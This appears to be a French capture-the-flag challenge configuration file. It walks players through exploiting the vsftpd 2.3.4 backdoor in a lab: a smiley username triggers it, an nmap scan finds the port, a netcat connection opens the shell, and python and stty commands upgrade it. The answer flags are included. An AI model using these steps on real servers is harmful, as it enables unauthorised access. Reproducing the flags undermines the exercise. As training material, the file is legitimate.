#
# CTF-exploit
# 
# Configuration des challenges
#
# [XXX] Label du challenge, doit être unique, sans contrainte particulière
# name: Home Sweet Home : Nom du challenge tel qu'il apparait sur les pages HTLM
# value: 10 : Nombre de points marqués pour la résolution du challenge
# category: Ghost in the Shell : Catégorie regroupant plusieurs challenges
# flag: flag_{m0n_pr3m13r_fl4g}
# file: (optionnel) : le nom d'un fichier qui sera téléchargeable par les participants.
# description: peut tenir sur une ou plusieures lignes.
#   [espace !!] Les lignes de la description DOIVENT commencer par un ESPACE ou une TABULATION 
#   Utiliser le tag HTML </br> pour marquer un saut de ligne.


[Intro]
category: Exploit
label: Exploit
docker: ctf-exploit
description: 
  ## Exploitation de vulnerabilité
  .
  Tous les programmes contiennent des bugs. Certains sont critiques et permettent une exploitation...
  Ces bugs sont généralement corrigés. Parfois pas...
  Les développeur incrémentent normalement le numéro de version du logiciel et publient une version corrective.
  .
  Nous allons faire l'inventaire des logiciels accessibles, récupérer leurs numéros de version et regarder pour chaque version quelles sont ces vulnérabiltiés.
  Pour celà, google est notre amis. La recherche 'logiciel numero-de-version exploit' sort généralement un lien vers exploit_db, un exploit sur github et des blogs décrivant la manip...
  .
  Cette version de vsftpd est réputé instable et crash facilement. Faites un 'Refresh' de la page pour controler l'état de votre serveur. 
  Une fois l'exploit déclenché, le serveur ftp freeze, voire plante. On retrouve frequement cet exploit sur des VM partagées, et tout le monde s'énerve car seul le premier arrivé peut exploiter. Les autres attendent ou demandent des reboot de VM... Enjoy...



[Challenge_vsftp_1]
name: Version
value: 5
category: Exploit
flag: 2.3.4
description: 
  Le serveur ftp qui tourne sur IPSERVER a été laissé en configuration par défaut.
  Il donne son nom et sa version à chaque connection.
  Pour le vérifier, connecte toi avec un netcat sur le port 21
  ```
  nc IPSERVER 21
  ```
  Déconnecte toi en tapant `quit`.
  Le flag est la version du serveur sous le format x.x.x




[Challenge_vsftp_2]
name: Backdoor
value: 40
category: Exploit
flag: 6200
description: 
  Utilise google pour trouver des informations sur ce logiciel.
  ```
  https://www.google.com/search?q=vsFTPd+2.3.4+exploit
  ```
  Il y a un lien vers https://www.exploit-db.com/ qui référence les failles et fournit généralement les exploits.
  Il y a un lien vers https://rapid7.com, ce qui veut dire que l'exploit est intégré à metasploit.
  Il va être confortable à utiliser.
  .
  Avant d'automatiser, nous allons le comprendre et l'exploiter à la main.
  .
  ```
  ftp IPSERVER
  ```
  Pour activer la backdoor, connecte-toi avec un nom d'utilisateur se terminant par un smiley :)
  Ton shell va se geler. Une backdoor est ouverte sur un port entre 6000 et 7000 en tcp. 
  Ouvre un second terminal et utilise un nmap pour scanner les ports ouverts.
  ```
  nmap IPSERVER -p6000-7000
  ```
  Le scan va déclencher la backdoor et crasher le serveur. Il faudra le relancer.
  Le flag est le numéro de port de la backdoor.
  Quitte ton client ftp en tapant `quit`.





[Challenge_vsftp_3]
name: Exploit
value: 40
category: Exploit
flag: flag_{th3_0nly_w1nn1ng_m0v3_1s_n0t_t0_pl4y}
description: 
  Si nécessaire, relance le serveur, et reconnecte-toi avec un nom d'utilisateur se terminant par un smiley :)
  ```
  ftp IPSERVER
  ```
  Ton shell va se geler. Une backdoor est ouverte.. Tu connais le port.
  Ouvre un second terminal et utilise un netcat pour y accéder...
  Fais un id, puis un ls
  Tu n'es pas dans un vrai shell. Pour utiliser un vrai shell fais spawn un bash avec python.
  ```
  python -c "import pty;pty.spawn('/bin/bash')"
  ```
  Tu as un shell, mais pas encore de tty. Dans 99% des cas, c'est suffisant.
  .
  Pour récupérer un tty, fait [Ctrl] Z pour passer ton shell en arrière plan. Tu repasses temporairement sur ton terminal, ne t'inquiète pas et fait
  ```
  stty raw -echo
  fg
  ```
  Maintenant tu es de retour sur ton serveur avec un vrai shell bash et un tty.
  Cherche le flag en /tmp
  Déconnecte toi avec exit
  le serveur ftp se degele.
  

